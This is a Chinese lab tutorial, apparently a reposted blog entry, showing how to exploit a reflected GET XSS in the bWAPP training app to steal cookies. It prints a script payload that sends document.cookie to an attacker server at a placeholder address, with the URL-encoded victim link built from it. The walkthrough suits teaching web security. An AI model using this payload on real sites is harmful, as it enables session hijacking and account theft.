当前位置:   article > 正文

bWAPP中利用反射型xss获取cookie_利用反射型跨站脚本攻击获取并利用cookie流程

利用反射型跨站脚本攻击获取并利用cookie流程
  1. 实验环境介绍
    靶机:bWAPP
    bug类型:XSS - Reflected (GET)
    难度级别:low
    过程:
    在这里插入图片描述
    注:部分浏览器默认开启了XSS防御,关闭后才能实验成功。
  2. 测试靶机(图中的web server)是否存在XSS攻击
    URL地址:“http://192.168.248.174/dvwa/bWAPP/xss_get.php”
    输入js代码
    <script>alert(123);</script>
    执行成功,如下图所示。说明在此处存在XSS攻击。
    在这里插入图片描述
    当我们在fist name和last name中输入数据并提交时,URL变为http://192.168.248.174/dvwa/bWAPP/xss_get.php?firstname=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E&lastname=22&form=submit,这就是URLA。可以看到URLA进行了URL编码。
  3. 构建xss攻击URLB
    思路:
    把URLB发送给受害者,受害者打开URLB地址,把受害者在URLA中的cookie传给攻击者的服务器。这里参考了该文章
    3.1在服务器端构建脚本,保存受害者传来的cookie。
    在这里插入图片描述
    3.2构建URLB
    攻击脚本代码如下(ip_address为攻击者服务器地址):
<script>document.location="http://ip_address/s_xss/getCookies.php?cookie="+document.cookie</script>
  • 1

进行URL编码

%3cscript%3edocument.location%3d%22http%3a%2f%2fip_address%2fs_xss%2fgetCookies.php%3fcookie%3d%22+document.cookie%3c%2fscript%3e
  • 1

利用URLA拼接构成具有攻击效果的URLB

http://192.168.248.174/dvwa/bWAPP/xss_get.php?firstname=%3cscript%3edocument.location%3d%22http%3a%2f%2fip_address%2fs_xss%2fgetCookies.php%3fcookie%3d%22+document.cookie%3c%2fscript%3e&lastname=22&form=submit
  • 1
  1. 把URLB发送给受害者,若此时受害者登录了URLA,打开URLB后,攻击者的服务器记录下受害的在URLA的cookie
    在这里插入图片描述
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/我家小花儿/article/detail/150112
推荐阅读
相关标签
  

闽ICP备14008679号